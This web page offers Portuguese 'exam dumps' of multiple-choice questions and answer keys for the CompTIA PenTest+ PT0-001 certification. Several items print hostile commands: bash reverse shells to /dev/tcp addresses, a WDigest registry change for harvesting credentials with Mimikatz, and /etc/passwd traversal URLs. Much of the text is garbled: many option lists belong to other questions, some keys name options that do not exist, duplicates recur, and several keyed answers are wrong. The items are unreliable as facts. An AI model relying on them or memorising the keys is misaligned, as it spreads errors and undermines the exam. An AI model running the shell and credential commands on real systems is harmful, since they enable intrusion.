NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Atualizado CompTIA PenTest+ PT0-001 Exam Dumps - Seu caminho para o sucesso

A preparação para o exame CompTIA PenTest+ PT0-001 com questões práticas e materiais de estudo de alta qualidade é crucial para passar com sucesso. A utilização de recursos de exame confiáveis que refletem com precisão o ambiente real do exame pode ajudar a identificar áreas que precisam de mais estudos. Os exames de simulação que simulam o formato de teste real e o nível de dificuldade permitem-lhe avaliar a sua preparação. Perguntas e respostas de exames bem elaboradas abrangem vários tópicos de testes de penetração e gestão de vulnerabilidades, permitindo-lhe reforçar os seus conhecimentos. Além disso, a utilização de guias de estudo e testes práticos de fornecedores conceituados pode garantir que se concentra em conteúdos de exame relevantes e actualizados. Ao se preparar adequadamente com recursos abrangentes de preparação para exames, você aumenta suas chances de enfrentar com confiança o exame de certificação CompTIA PenTest+ PT0-001.
Faça outros exames online

Pergunta #1
Um técnico de testes de penetração analisa os resultados do exame de uma aplicação Web. Qual das seguintes vulnerabilidades é a MAIS crítica e deve ser priorizada para exploração?
A. XSS armazenado
B. Revelação do percurso de preenchimento
C. ertificado expirado
D. Clickjacking
Ver resposta
Resposta correta: A
Pergunta #2
Durante um teste de penetração de rede interna, um testador recupera o hash da senha NTLM de um usuário conhecido por ter privilégios totais de administrador em vários sistemas-alvo. Os esforços para decifrar o hash e recuperar a palavra-passe em texto simples não tiveram êxito. Qual dos seguintes seria o MELHOR alvo para esforços de exploração contínuos?
A. Sistema operativo: Windows 7 Portas abertas: 23, 161
B. Sistema operativo: Windows Server 2016 Portas abertas: 53, 5900
C. Sistema operativo: Windows 8
D. Sistema operativo: Windows 8 Portas abertas: 514, 3389
Ver resposta
Resposta correta: C
Pergunta #3
Um testador de penetração é capaz de se mover lateralmente por um domínio com o mínimo de bloqueios após comprometer uma única estação de trabalho. Qual das seguintes estratégias de atenuação seria a MELHOR para recomendar no relatório? (Seleccione TRÊS).
A. Ataque de despejo de credenciais
B. Ataque de injeção de DLL
C. Ataque inverso da concha
D. Passar o ataque de hash
Ver resposta
Resposta correta: CDE
Pergunta #4
Durante um teste de penetração interna, vários pedidos de resolução de nomes multicast e broadcast são observados a atravessar a rede. Qual das seguintes ferramentas pode ser utilizada para se fazer passar por recursos de rede e recolher pedidos de autenticação?
A. ttercap
B. cpdump
C. Respondente
D. Medusa
Ver resposta
Resposta correta: C
Pergunta #5
Um programador de software pretende testar o código de uma aplicação para detetar vulnerabilidades. Qual dos seguintes processos deve o programador de software efetuar?
A. Análise de vulnerabilidades
B. Verificação dinâmica
C. Verificação estática
D. Verificação de conformidade
Ver resposta
Resposta correta: A
Pergunta #6
Durante um teste de penetração, um testador executa uma campanha de phishing e recebe um shell de um PC interno que executa o sistema operacional Windows 10. O testador pretende executar a recolha de credenciais com o Mimikatz. Qual das seguintes alterações de registo permitiria o armazenamento em cache de credenciais na memória?
A. eg add HKLM\\System\\\ControlSet002\\Control\\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. eg add HKCU\\System\\\CurrentControlSet\\Control\\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. eg add HKLM\\Software\\CurrentControlSet\\Control\\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. eg add HKLM\\System\\\CurrentControlSet\\Control\\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 1
Ver resposta
Resposta correta: A
Pergunta #7
Foi pedido a um técnico de testes de penetração que efectuasse um teste de penetração num serviço Web baseado em REST. Qual dos seguintes itens é necessário?
A. Os últimos resultados da análise de vulnerabilidades
B. Uma lista de exemplos de pedidos de aplicação
C. Uma lista actualizada de possíveis explorações
D. Uma lista de exemplos de contas de teste
Ver resposta
Resposta correta: B
Pergunta #8
Um técnico de testes de penetração executa os seguintes comandos: Qual das seguintes é uma vulnerabilidade do anfitrião local que o atacante está a explorar?
A. Permissões de ficheiro inseguras
B. Lista branca de aplicações
C. Escapar da shell
D. Serviço gravável
Ver resposta
Resposta correta: A
Pergunta #9
Um técnico de testes de penetração está a analisar uma rede em busca de SSH e tem uma lista de alvos fornecidos. Qual dos seguintes comandos do Nmap o testador deve usar?
A. nmap -p 22 -iL alvos
B. nmap -p 22 -sL alvos
C. nmap -p 22 -oG alvos
D. nmap -p 22 -oA alvos
Ver resposta
Resposta correta: A
Pergunta #10
Um engenheiro, que está a realizar um teste de penetração para uma aplicação Web, descobre que o processo de início de sessão do utilizador envia dados de campo utilizando o método HTTP GET. Para mitigar o risco de exposição de informações sensíveis, o formulário deve ser enviado usando o método HTTP GET:
A. Método HTTP POST
B. Método HTTP OPTIONS
C. étodo HTTP PUT
D. Método HTTP TRACE
Ver resposta
Resposta correta: A
Pergunta #11
Um analista de segurança descobriu um pedido suspeito nos registos de uma aplicação Web. Dado o seguinte URL:http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswdWhich dos seguintes tipos de ataque é MAIS provável que seja a vulnerabilidade?
A. Desvio do âmbito
B. Revisão post-mortem
C. Aceitação dos riscos
D. Prevenção de ameaças
Ver resposta
Resposta correta: B
Pergunta #12
Um atacante utiliza a SET para fazer uma cópia do portal de correio Web alojado na nuvem de uma empresa e envia um e-mail na esperança de que o Diretor Executivo (CEO) inicie sessão para obter as credenciais de início de sessão do CEO. Este é um exemplo de qual dos seguintes tipos de ataques?
A. Ataque de elicitação
B. Ataque de falsificação de identidade
C. Ataque de Spear phishing
D. Ataque de descarregamento drive-by
Ver resposta
Resposta correta: A
Pergunta #13
Durante a fase de recolha de informações de um teste de penetração de rede para o domínio corp.local, qual dos seguintes comandos forneceria uma lista de controladores de domínio?
A. slookup -type=srv _ldap
B. map -sV -p 389 - -script=ldap-rootdse corp
C. et grupo "Controladores de domínio" /domínio
D. presult /d corp
Ver resposta
Resposta correta: A
Pergunta #14
Uma empresa contrata um testador de penetração para determinar se há alguma vulnerabilidade na nova instalação do concentrador de VPN com um IP externo de 100.170.60.5. Qual dos seguintes comandos testará se a VPN está disponível?
A. pipe
B. ke-scan -A -t 1 --sourceip=spoof_ip 100
C. map -sS -A -f 100
D. c 100
Ver resposta
Resposta correta: B
Pergunta #15
Clique no botão de exibição. Um testador de penetração está realizando uma avaliação quando o administrador de rede mostra ao testador uma amostra de pacote que está causando problemas na rede. Qual dos seguintes tipos de ataques o testador deve interromper?
A. Força bruta SNMP
B. Falsificação de ARP
C. nvenenamento de cache DNS
D. etransmissão SMTP
Ver resposta
Resposta correta: A
Pergunta #16
Joe, um atacante, pretende transferir fundos discretamente da conta de uma vítima para a sua própria conta. Qual dos seguintes URLs ele pode usar para realizar esse ataque?
A. ttps://testbank
B. ttps://testbank
C. ttps://testbank
D. ttps://testbank
Ver resposta
Resposta correta: B
Pergunta #17
Se um consultor de segurança se deparar com um hash de palavra-passe semelhante ao seguinte: b117525b345470c29ca3d8ae0b556ba8Qual dos seguintes formatos é o tipo de hash correto?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
Ver resposta
Resposta correta: D
Pergunta #18
Um técnico de testes de penetração pretende verificar manualmente se existe uma vulnerabilidade "fantasma" num sistema. Qual dos seguintes métodos é a forma correcta de validar a vulnerabilidade?
A. Descarregar o ficheiro GHOST para um sistema Linux e compilegcc -o GHOSTtest i:
B. Descarregar o ficheiro GHOST para um sistema Windows e compilegcc -o GHOST GHOST
C. Descarregar o ficheiro GHOST para um sistema Linux e compilegcc -o GHOST GHOST
D. Descarregar o ficheiro GHOST para um sistema Windows e compilegcc -o GHOSTtest i:
Ver resposta
Resposta correta: C
Pergunta #19
Um testador de penetração observa que o cabeçalho da política de segurança de conteúdo está em falta durante um teste de penetração de uma aplicação Web. Qual das técnicas a seguir o testador de penetração MAIS provavelmente executaria?
A. Ataque de injeção de comandos
B. Ataque de clickjacking
C. Ataque de travessia de diretório
D. Ataque remoto de inclusão de ficheiros
Ver resposta
Resposta correta: B
Pergunta #20
Durante a pós-exploração, um testador identifica que apenas os binários do sistema passarão por um filtro de saída e armazenam um ficheiro com o seguinte comando:c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.dbDe qual das seguintes vulnerabilidades do sistema de ficheiros este comando tira partido?
A. Sistema de ficheiros hierárquico
B. Fluxos de dados alternativos
C. Sucesso do backdoor
D. Sistema de ficheiros alargado
Ver resposta
Resposta correta: B
Pergunta #21
Um técnico de testes de penetração está a analisar uma rede em busca de SSH e tem uma lista de alvos fornecidos. Qual dos seguintes comandos do Nmap o testador deve usar?
A. map -p 22 -iL alvos
B. map -p 22 -sL alvos
C. map -p 22 -oG alvos
D. map -p 22 -oA alvos
Ver resposta
Resposta correta: A
Pergunta #22
Um testador de penetração está verificando um script para determinar por que alguns erros básicos de matemática estão persistindo. Dada a saída do console acima, qual das opções a seguir explica como corrigir os erros no script? (Escolha duas.)
A. OW
B. DA
C. ULA
D. BPA
Ver resposta
Resposta correta: BD
Pergunta #23
Ao tentar manter a persistência num sistema Windows com privilégios limitados, qual das seguintes chaves de registo deve ser utilizada pelo verificador?
A. KEY_CLASSES_ROOT
B. KEY_LOCAL_MACHINE
C. KEY_CURRENT_USER
D. KEY_CURRENT_CONFIG
Ver resposta
Resposta correta: C
Pergunta #24
Qual das seguintes ferramentas é utilizada por um técnico de testes de penetração para realizar OSINT? (Seleccione DUAS).
A. Endereço MAC do cliente
B. ndereço MAC do controlador de domínio
C. ndereço MAC do servidor Web
D. ndereço MAC do gateway
Ver resposta
Resposta correta: AE
Pergunta #25
Um testador de penetração pretende lançar uma janela de consola gráfica a partir de um anfitrião remotamente comprometido com o IP 10.0.0.20 e apresentar o terminal no computador local com o IP 192.168.1.10. Qual das seguintes opções realizaria essa tarefa?
A. partir do computador remoto, execute os seguintes comandos:export XHOST 192
B. partir do computador local, execute o seguinte comando:ssh -L4444:127
C. partir do computador remoto, execute o seguinte comando:ssh -R6000:127
D. partir do computador local, execute o seguinte comando:nc -l -p 6000Depois, a partir do computador remoto, execute o seguinte comando:xterm | nc 192
Ver resposta
Resposta correta: A
Pergunta #26
Qual das seguintes opções seria a MELHOR para efetuar um reconhecimento passivo no domínio externo de um alvo?
A. Pêssego
B. eWL
C. penVAS
D. Shodan
Ver resposta
Resposta correta: D
Pergunta #27
Qual das seguintes opções é um exemplo de um ataque de spear phishing?
A. Exemplos de mensagens SOAP
B. A documentação da API REST
C. Um utilitário de fuzzificação de protocolos
D. Um ficheiro XSD aplicável
Ver resposta
Resposta correta: A
Pergunta #28
Qual das seguintes opções explica MELHOR por que razão é importante manter a confidencialidade de quaisquer descobertas identificadas ao efetuar um teste de penetração?
A. Os resultados dos testes de penetração contêm frequentemente propriedade intelectual da empresa
B. Os resultados dos testes de penetração podem levar à insatisfação dos consumidores se forem tornados públicos
C. Os resultados dos testes de penetração são documentos legais que contêm informações privilegiadas
D. Os resultados dos testes de penetração podem ajudar um atacante a comprometer um sistema
Ver resposta
Resposta correta: D
Pergunta #29
Durante uma avaliação de segurança de âmbito total, qual das seguintes opções é um pré-requisito para efetuar engenharia social num alvo, envolvendo-o fisicamente?
A. Localização das saídas de emergência
B. Preparar um pretexto
C. Surfar o ombro da vítima
D. Perseguir a vítima
Ver resposta
Resposta correta: B
Pergunta #30
Uma empresa planeou e assegurou o orçamento para contratar um consultor para realizar um teste de penetração de uma aplicação Web. Após a descoberta de vulnerabilidades, a empresa pediu ao consultor que executasse as seguintes tarefas:-Revisão de código-Actualizações às definições da firewallQual das seguintes situações ocorreu nesta situação?
A. Enumeração dos serviços
B. Recolha de OSINT
C. Varrimento de portas
D. Engenharia social
Ver resposta
Resposta correta: A
Pergunta #31
Um técnico de testes de penetração executou a seguinte verificação do Nmap num computador:nmap -aV 192.168.1.5A organização afirmou ter desativado o Telnet do seu ambiente. No entanto, os resultados do scan do Nmap mostram a porta 22 como fechada e a porta 23 como aberta para SSH. Qual das seguintes é a MELHOR explicação para o que aconteceu?
A. A organização não conseguiu desativar o Telnet
B. s resultados do Nmap contêm um falso positivo para a porta 23
C. porta 22 foi filtrada
D. O serviço está a ser executado numa porta não padrão
Ver resposta
Resposta correta: A
Pergunta #32
Qual das seguintes propriedades do acordo de compromisso de teste de penetração terá o MAIOR impacto na observação e teste dos sistemas de produção nas suas cargas mais elevadas?
A. Criação de um âmbito dos sistemas de produção críticos
B. efinir um calendário de horários de acesso aos testes
C. Estabelecer um compromisso de teste de caixa branca
D. Ter a direção a aprovar os testes intrusivos
Ver resposta
Resposta correta: B
Pergunta #33
Um técnico de testes de penetração implantou com êxito um gémeo mau e está a começar a ver algum tráfego de vítimas. O próximo passo que o testador de penetração quer dar é capturar todo o tráfego da Web da vítima sem criptografia. Qual das seguintes opções seria a MELHOR para atingir este objetivo?
A. Efetuar um ataque de downgrade HTTP
B. Recolher as credenciais do utilizador para desencriptar o tráfego
C. Efetuar um ataque MITM
D. Implementar um ataque de CA fazendo-se passar por CAs de confiança
Ver resposta
Resposta correta: A
Pergunta #34
Qual das seguintes opções descreve MELHOR alguns pontos fracos significativos da segurança de um ICS, como os utilizados em instalações de serviços eléctricos, instalações de gás natural, barragens e instalações nucleares?
A. Os fornecedores de ICS são lentos a implementar controlos de segurança adequados
B. O pessoal do ICS não tem formação adequada para desempenhar as funções básicas
C. Existe uma escassez de equipamento de substituição para dispositivos críticos
D. Existe uma falta de conformidade para as instalações ICS
Ver resposta
Resposta correta: B
Pergunta #35
Um técnico de testes de penetração efectuou uma análise das vulnerabilidades de um anfitrião específico que contém uma base de dados valiosa e identificou as seguintes vulnerabilidades:-XSS-HTTP DELETE method allowed-SQL injection-Vulnerable to CSRFTa qual das seguintes vulnerabilidades deve o técnico de testes dar a maior prioridade?
A. Injeção de SQL
B. étodo HTTP DELETE permitido
C. Vulnerável a CSRF
D. SS
Ver resposta
Resposta correta: B
Pergunta #36
Um testador de penetração quer criar um script para descobrir todos os registos RPTR para um intervalo de endereços IP. Qual das seguintes opções é a MAIS eficiente a ser utilizada?
A. map -p 53 -oG dnslist
B. slookup -ns 8
C. or x in {1
D. ig -r > echo "8
Ver resposta
Resposta correta: A
Pergunta #37
Dado o seguinte:http://example.com/download.php?id-.../.../.../etc/passwdWhich dos seguintes itens descreve MELHOR o ataque acima?
A. Ataque malicioso de carregamento de ficheiros
B. Ataque de redireccionamento
C. Ataque de travessia de diretório
D. Ataque inseguro de referência ao objeto direto
Ver resposta
Resposta correta: C
Pergunta #38
Durante a avaliação de uma aplicação Web, um técnico de testes de penetração descobre que podem ser executados comandos arbitrários no servidor. Querendo levar esse ataque um passo adiante, o testador de penetração começa a explorar maneiras de obter um shell reverso de volta para a máquina atacante em 192.168.1.5. Quais das seguintes são formas possíveis de o fazer? (Seleccione DUAS).
A. Os fabricantes que desenvolvem dispositivos IoT estão menos preocupados com a segurança
B. É difícil para os administradores implementar as mesmas normas de segurança em todo o sistema
C. Os sistemas IoT carecem frequentemente da potência de hardware exigida por soluções mais seguras
D. As autoridades reguladoras têm frequentemente requisitos de segurança mais baixos para os sistemas IoT
Ver resposta
Resposta correta: BC
Pergunta #39
Por qual das seguintes razões é que um técnico de testes de penetração necessita de ter sempre disponível a informação do ponto de contacto de um cliente? (Escolha três.)
A. SASS
B. Base de dados SAM
C. iretório Ativo
D. Registo
Ver resposta
Resposta correta: ACF
Pergunta #40
Um testador de penetração comprometeu um servidor Windows e está a tentar obter persistência. Qual das seguintes opções atingiria esse objetivo?
A. chtasks
B. et session server | dsquery -user | net use c$
C. owershell && set-executionpolicy unrestricted
D. eg guardar HKLM\\System\\\CurrentControlSet\\Services\\\Sv
Ver resposta
Resposta correta: D
Pergunta #41
Um técnico de testes de penetração está a redigir um relatório que descreve o nível geral de risco para as operações. Em qual das seguintes áreas do relatório é que o técnico de testes de penetração deve colocar essa informação?
A. Aumentar horizontalmente os privilégios
B. Extrair da página os campos ocultos
C. Analisar o código de resposta HTTP
D. rocurar cabeçalhos HTTP
Ver resposta
Resposta correta: B
Pergunta #42
Em qual dos seguintes componentes é MAIS provável que uma vulnerabilidade explorada afecte vários contentores de aplicações em execução ao mesmo tempo?
A. Bibliotecas comuns
B. Ficheiros de configuração
C. Fuga da caixa de areia
D. Desvio ASLR
Ver resposta
Resposta correta: A
Pergunta #43
Uma empresa solicitou a um técnico de testes de penetração que analisasse a segurança de uma aplicação Android desenvolvida internamente. O testador de penetração recebeu um arquivo APK para apoiar a avaliação. O testador de penetração deseja executar o SAST no arquivo APK. Qual das seguintes etapas preparatórias deve ser executada PRIMEIRO pelo analista de penetração? (Seleccione DOIS).
A. O software obsoleto pode conter componentes exploráveis
B. Podem ser utilizadas práticas de gestão de palavras-passe pouco rigorosas
C. Os protocolos criptograficamente fracos podem ser interceptados
D. As configurações do servidor Web podem revelar informações sensíveis
Ver resposta
Resposta correta: AB
Pergunta #44
Um técnico de testes de penetração está a analisar os seguintes resultados de um sniffer sem fios: Qual das seguintes opções pode ser extrapolada a partir das informações acima?
A. Princípio do medo
B. Princípio da autoridade
C. Princípio da escassez
D. Princípio da semelhança
E. Princípio da prova social
Ver resposta
Resposta correta: C
Pergunta #45
Um testador de penetração executa o seguinte a partir de um computador comprometido: 'python -c 'import pty;pty.spawn ("/bin/bash") '. Qual das seguintes acções o testador está a realizar?
A. Remover o histórico do Bash
B. tualização da shell
C. riar uma caixa de areia
D. apturar credenciais
Ver resposta
Resposta correta: B
Pergunta #46
Um cliente solicita que um técnico de testes de penetração imite um técnico de help desk que foi recentemente despedido. Qual das seguintes opções descreve MELHOR as capacidades do agente da ameaça?
A. Ameaça persistente avançada
B. Miúdo do guião
C. Hacktivista
D. Crime organizado
Ver resposta
Resposta correta: B
Pergunta #47
Uma mensagem de correio eletrónico enviada pelo diretor executivo (CEO) para o diretor financeiro (CFO) indica que é necessária uma transferência eletrónica para pagar a um novo fornecedor. Nenhum dos dois tem conhecimento do fornecedor e o CEO nega ter enviado o e-mail. Qual dos seguintes tipos de motivação foi utilizado neste ataque?
A. Modificar a configuração de criptografia do servidor Web para utilizar um conjunto de cifras mais forte para encriptação, hashing e assinatura digital
B. Implementar uma nova formação para estar ciente dos riscos no acesso à aplicação
C. Implementar uma ACL para restringir o acesso à aplicação exclusivamente ao departamento financeiro
D. Exigir que os utilizadores dos salários alterem as palavras-passe utilizadas para autenticar a aplicação
Ver resposta
Resposta correta: B
Pergunta #48
Um testador pretende executar o seguinte comando num sistema de destino:bash -i >& /dev/tcp/10.2.4.6/443 0> &1Qual dos seguintes comandos adicionais teria de ser executado no sistema Linux do testador para que o comando anterior fosse bem sucedido?
A. c -nlvp 443
B. c 10
C. c -w3 10
D. c -e /bin/sh 10
Ver resposta
Resposta correta: D
Pergunta #49
Um consultor de segurança recebe um documento que descreve o âmbito de um teste de penetração futuro. Esse documento contém endereços IP e horários em que cada um pode ser verificado. Qual dos seguintes itens conteria essas informações?
A. Regras de empenhamento
B. Pedido de proposta
C. Contrato-quadro de serviços
D. Análise do impacto nas empresas
Ver resposta
Resposta correta: A
Pergunta #50
O seguinte comando é executado num sistema de ficheiros Linux:chmod 4111 /usr/bin/sudoQual dos seguintes problemas pode ser explorado agora?
A. Vulnerabilidades do kernel
B. Fragmentos pegajosos
C. aminho de serviço não cotado
D. udo mal configurado
Ver resposta
Resposta correta: B
Pergunta #51
Se um consultor de segurança se deparar com um hash de palavra-passe semelhante ao seguinte: b117525b345470c29ca3d8ae0b556ba8Qual dos seguintes formatos é o tipo de hash correto?
A. Kerberos
B. etNTLMv1
C. TLM
D. HA-1
Ver resposta
Resposta correta: D
Pergunta #52
A seguinte linha foi encontrada no ficheiro de histórico de uma máquina explorada. Um atacante executou o seguinte comando:bash -i >& /dev/tcp/192.168.0.1/80 0> &1Qual das seguintes opções descreve o que o comando faz?
A. rrombamento de fechaduras
B. Acionamento do sensor de saída
C. Bloqueio de choques
D. Desvio de bloqueio
Ver resposta
Resposta correta: C
Pergunta #53
Um guarda de segurança observa um indivíduo a entrar no edifício depois de passar um cartão. O segurança audita o sistema de cartões e encontra duas entradas de registo para o cartão em questão nos últimos 30 minutos. Qual das seguintes situações é mais provável ter ocorrido?
A. O crachá foi clonado
B. O servidor de controlo de acesso físico está avariado
C. O sistema atingiu a taxa de erro de crossover
D. O empregado perdeu o crachá
Ver resposta
Resposta correta: A
Pergunta #54
Um técnico de testes de penetração está a preparar-se para realizar testes de API. Qual das seguintes opções seria MAIS útil na preparação para este compromisso?
A. Nikto
B. GUERRA
C. W3AF
D. Swagger
Ver resposta
Resposta correta: D
Pergunta #55
Um testador de penetração tem um shell completo para um controlador de domínio e quer descobrir qualquer conta de utilizador que não tenha sido autenticada no domínio em 21 dias. Qual dos seguintes comandos seria o MELHOR para atingir este objetivo?
A. dsrm -users ?€DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
Ver resposta
Resposta correta: D
Pergunta #56
Num cenário de teste de um testador de penetração física, o testador de penetração obtém acesso físico a um computador portátil. O portátil tem sessão iniciada mas está bloqueado. Qual das seguintes opções é um potencial PRÓXIMO passo para extrair credenciais do dispositivo?
A. Forçar a password do utilizador
B. fetuar um ataque de falsificação de ARP
C. proveitar a estrutura BeEF para capturar credenciais
D. Conduzir o envenenamento LLMNR/NETBIOS-ns
Ver resposta
Resposta correta: A
Pergunta #57
Num cenário de teste de um testador de penetração física, o testador de penetração obtém acesso físico a um computador portátil. O portátil tem sessão iniciada mas está bloqueado. Qual das seguintes opções é um potencial PRÓXIMO passo para extrair credenciais do dispositivo?
A. Força bruta na palavra-passe do utilizador
B. Efetuar um ataque de falsificação de ARP
C. Tirar partido da estrutura BeEF para captar credenciais
D. Efetuar o envenenamento LLMNR/NETBIOS-ns
Ver resposta
Resposta correta: A
Pergunta #58
Um testador de penetração compromete um sistema que tem acesso irrestrito à rede pela porta 443 para qualquer host. O testador de penetração quer criar um shell reverso da vítima de volta para o atacante. Qual dos seguintes métodos o testador de penetração usaria com maior probabilidade?
A. erl -e 'use SOCKET'; $i='; $p='443;
B. sh superadmin@-p 443
C. c -e /bin/sh443
D. ash -i >& /dev/tcp//443 0>&1
Ver resposta
Resposta correta: D
Pergunta #59
Qual das seguintes é a razão pela qual um testador de penetração executaria o comando chkconfig --del servicename no final de um compromisso?
A. rpspoof
B. map
C. esponder
D. urpsuite
Ver resposta
Resposta correta: A
Pergunta #60
Qual das seguintes situações levaria um técnico de testes de penetração a comunicar com o proprietário/cliente de um sistema durante um teste? (Seleccione DUAS.)
A. plicar controlos de compensação fáceis para vulnerabilidades críticas para minimizar o risco e, em seguida, redefinir a prioridade da correção
B. Identificar os problemas que podem ser resolvidos mais rapidamente e tratá-los em primeiro lugar
C. Implementar primeiro as medidas de correção das vulnerabilidades críticas com menor impacto e, em seguida, abordar outras vulnerabilidades críticas
D. Corrigir primeiro a vulnerabilidade mais crítica, mesmo que isso signifique que a correção das outras vulnerabilidades possa demorar muito tempo
Ver resposta
Resposta correta: BD
Pergunta #61
Instruções: Dadas as seguintes assinaturas de ataque, determine o tipo de ataque e, em seguida, identifique a correção associada para evitar o ataque no futuro. Se, a qualquer momento, pretender voltar ao estado inicial da simulação, clique no botão Repor tudo:
A. Ver a secção Explicação para obter a resposta
Ver resposta
Resposta correta: A
Pergunta #62
Um guarda de segurança observa um indivíduo a entrar no edifício depois de passar um cartão. A instalação tem um requisito rigoroso de entrada e saída de cartões com um torniquete. O guarda de segurança audita o sistema de cartões e encontra duas entradas de registo para o cartão em questão nos últimos 30 minutos. Qual das seguintes situações é a mais provável de ter ocorrido?
A. O crachá foi clonado
B. O servidor de controlo de acesso físico está avariado
C. O sistema atingiu a taxa de erro de cruzamento
D. O empregado perdeu o crachá
Ver resposta
Resposta correta: A
Pergunta #63
Qual dos seguintes comandos permitiria a um testador de penetração aceder a uma rede privada a partir da Internet no Metasploit?
A. efinir rhost 192
B. xecutar autoroute -s 192
C. b_nmap -iL /tmp/privatehosts
D. tilizar auxiliar/servidor/socks4a
Ver resposta
Resposta correta: A
Pergunta #64
Qual dos seguintes é o objetivo de um NDA?
A. Define os termos de confidencialidade entre ambas as partes
B. Define os limites dos sistemas autorizados a serem testados
C. escreve os requisitos dos ensaios técnicos que são permitidos
D. Apresenta a configuração detalhada da rede
Ver resposta
Resposta correta: A
Pergunta #65
Um testador de penetração, que não está na rede do cliente, está a utilizar o Nmap para analisar a rede em busca de anfitriões que estejam no âmbito. O testador de penetração não está recebendo nenhuma resposta ao comando:nmap 100.100/1/0-125Qual dos seguintes comandos seria o MELHOR para retornar resultados?
A. map -Pn -sT 100
B. map -sF -p 100
C. map -sV -oA saída 100
D. map 100
Ver resposta
Resposta correta: A
Pergunta #66
Dado o seguinte script Python: Qual dos seguintes é o destino da saída?
A. Para o ecrã
B. Para um servidor de rede
C. ara um ficheiro
D. ara /dev/null
Ver resposta
Resposta correta: C
Pergunta #67
Um cliente está a pedir a um técnico de testes de penetração que avalie a disponibilidade de uma nova aplicação Web. Qual dos seguintes tipos de ataques o testador deve usar?
A. Inundação TCP SYN
B. njeção de SQL
C. SS
D. MAS scan
Ver resposta
Resposta correta: B
Pergunta #68
Qual das seguintes opções seria a MELHOR para efetuar um reconhecimento passivo no domínio externo de um alvo?
A. Pêssego
B. CeWL
C. OpenVAS
D. Shodan
Ver resposta
Resposta correta: D
Pergunta #69
Qual dos seguintes registos do CPU é necessário substituir para explorar um simples buffer overflow?
A. Registo do ponteiro de pilha
B. Registo do ponteiro de índice
C. Ponteiro de base da pilha
D. egisto do índice de destino
Ver resposta
Resposta correta: A

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: